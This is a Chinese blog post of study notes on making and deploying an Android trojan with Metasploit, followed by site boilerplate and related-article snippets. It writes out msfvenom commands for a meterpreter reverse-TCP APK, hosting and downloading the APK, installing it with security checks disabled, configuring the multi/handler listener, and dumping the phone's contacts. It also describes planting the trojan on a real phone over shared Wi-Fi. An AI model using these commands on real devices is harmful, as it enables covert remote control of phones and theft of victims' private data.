我的MSF之Android木马渗透的学习笔记

这篇具有很好参考价值的文章主要介绍了我的MSF之Android木马渗透的学习笔记。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!!

环境准备

攻击机:kali

靶机:Android

一、入侵操作

1.木马制作

通过msfvenom制作安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk

2.开启http服务

kali 终端输入以下命令开启http服务

python3 -m http.server 80

3.靶机下载木马

由于此安卓虚拟机bug问题,我们无法在该靶机的浏览器中输入对应 ip去下载木马,而是需要到终端输入命令来下载木马:

终端下载命令:

wget 10.9.136.152/android_yuanboss.apk

msf生成安卓木马,保护国家网络安全,android,kali,msf

但是发现下载失败,因为android当前目录下是只读文件系统,我们如果需要下载东西,就需要到sdcard目录中进行下载:

cd sdcard
wget 10.9.136.152/android_yuanboss.apk

如图所示,表示下载成功:

msf生成安卓木马,保护国家网络安全,android,kali,msf

4.安装木马

打开Android中的文件之后,如图所示:

msf生成安卓木马,保护国家网络安全,android,kali,msf

最后一个就是我们下载的木马,我们直接傻瓜式安装即可,其中注意安装过程中取消安全检查。

安装完之后,可以在桌面中看到如下图标:

msf生成安卓木马,保护国家网络安全,android,kali,msf

5.监听的配置

1.选择后门模块(必须进行这一步模块的选择,否则无法进行后面的步骤

use exploit/multi/handler 

2.设置攻击载荷 payload(和创建木马的载荷一样)

set payload android/meterpreter/reverse_tcp 

3.设置攻击机的 ip (和创建木马时的 ip 一样)

 set lhost 10.9.136.152

4.设置攻击机的端口 port (和创建木马时的端口一样)

set lport 4444

上述监听配置如图所示:

msf生成安卓木马,保护国家网络安全,android,kali,msf

6.启动监听

run

如图所示:

msf生成安卓木马,保护国家网络安全,android,kali,msf

7.木马上线

在靶机中打开木马程序

8.监听成功

msf生成安卓木马,保护国家网络安全,android,kali,msf

二、渗透操作

1.获取手机通讯录

首先在靶机中的通讯录中添加信息,然后运行木马程序,然后到 kali中运行如下命令:

dump_contacts 

msf生成安卓木马,保护国家网络安全,android,kali,msf

根据日志可以得知,通讯录信息存放到了当前目录下的 contacts_dump_20230607062727.txt文件中

接下来通过 cat命令查看该文件:

msf生成安卓木马,保护国家网络安全,android,kali,msf

我们可以看到,已经成功获取通讯录信息

三、手机植入木马实战

实操逻辑和上述内容是一样的,只要确保 kali 可以与手机的 ip 相连,就可以实现木马植入。

所以难点在于如何使我们的 kali 和 手机相连,让 kali 与安卓手机相连的流程如下:

如下图所示,我们只需要确保我们的电脑与安卓手机连接同一个无线路由器,为了确保物理机中的kali能和安卓手机处于同一个网段,我们需要给kali设置为桥接模式,并且在虚拟网络编辑器中给桥接网络设置网卡为无线网卡,无线网卡的名字可以在物理机的批处理窗口中通过 ipconfig /all 查看,无线局域网适配器 WLAN的描述内容即为无线网卡名称 。配置好虚拟机之后,查看 kali 与安卓手机的ip地址,即可发现处于同一网段,并且可以kali可以ping通安卓手机的 ip

msf生成安卓木马,保护国家网络安全,android,kali,msf

确保 kali 与 安卓 相连成功之后,执行上面的入侵操作与渗透操作即可!

四、总结

Android入侵与Windows是一样的,只需要确保攻击机器与靶机之间网络可以连通,就可以实现渗透利用。

要注意Android文件只有只读权限,我们需要切换到sdcard目录,才能实现文件的下载

文件下载的命令是:

wget ip/文件名
例如: weget 10.9.136.152/android_yuanboss.apk

执行上面的入侵操作与渗透操作即可!文章来源地址https://www.toymoban.com/news/detail-652268.html

到了这里,关于我的MSF之Android木马渗透的学习笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • msf使用木马控制android手机

    msf使用木马控制android手机 kali、手机模拟器(或不用的手机)。 手机模拟器(或者手机)与电脑可以互相连通吗,即手机可以直接访问到kali。 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 android_shell.apk ; 2、手机安装木马。 想办法把木马放到手机模拟器(

    2024年02月10日
    浏览(42)
  • Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

    博主根据日后学习会不断更新文章,后续用到新的功能会不定时更新。 以下内容只供学习使用,请勿违法使用! 目录 一、常用指令 二、监听模块 2.1 防止假session 2.2 实现后台持续监听 三、msfvenom(payload生成模块) 3.1 参数介绍 3.2 常用指令 3.3 payload 生成 3.3.1 Linux 3.3.2 Windows

    2024年02月07日
    浏览(42)
  • Kali Linux使用MSF木马入侵安卓手机

    声明: 本文章仅做娱乐和学习,切勿非法使用!! 本人技术一般,水平有限,如有不对请多多指正。 Kali Linux 安卓手机一部(安卓11) 要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的 CSDN博主「Lisa

    2024年01月24日
    浏览(42)
  • msf学习笔记

    渗透工具使用指南 ·  序言 ·  ·  信息收集工具 ·  ·  漏洞扫描(分析) ·  抓包改包 ·  Burpsuite ·  ·  Fiddler ·  ·  Wireshark ·  漏洞利用 ·  Hydra ·  ·  Metasploit ·  ·  SQLmap ·  ·  Beef ·  ·  antSword ·  xss在线工具 本文档使用 看云 构建 Metasploit 基础库文件(Libraris):提供

    2024年02月21日
    浏览(36)
  • MSF手机渗透实验

      本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。 实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。 此时手机的ip段为192.168.43.0段故需要更改虚拟机ip 更改静态i

    2024年02月11日
    浏览(44)
  • 渗透测试神器-msf基础

    Metasploit-framework(用ruby写的)基础: MSF拥有世界上最大的渗透测试攻击数据库 Vulnerability:漏洞统称 expoit:攻击代码或者程序 Payload:完成实际攻击功能的代码 module:组成完整系统的基本构造块,每个模块执行特定任务 运行msf: msf模块介绍: Exploit:msf最核心的模块,里面有针对

    2024年02月05日
    浏览(78)
  • msf渗透练习-震网三代

      说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽) “震网三代”官方漏洞编号是CVE-2017-8464,2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径

    2024年02月09日
    浏览(45)
  • metasploit(MSF)渗透超细解说 -- 小黑渗透工具

    metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!! 初心:    记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有

    2024年01月20日
    浏览(42)
  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(46)
  • 详尽的msf——meterpreter——渗透测试教程

    本文仅供学习参考使用,切勿用于非法事情!! 众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。 现在发现msf很厉害,可以在它的基础上开发。 msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期

    2023年04月15日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包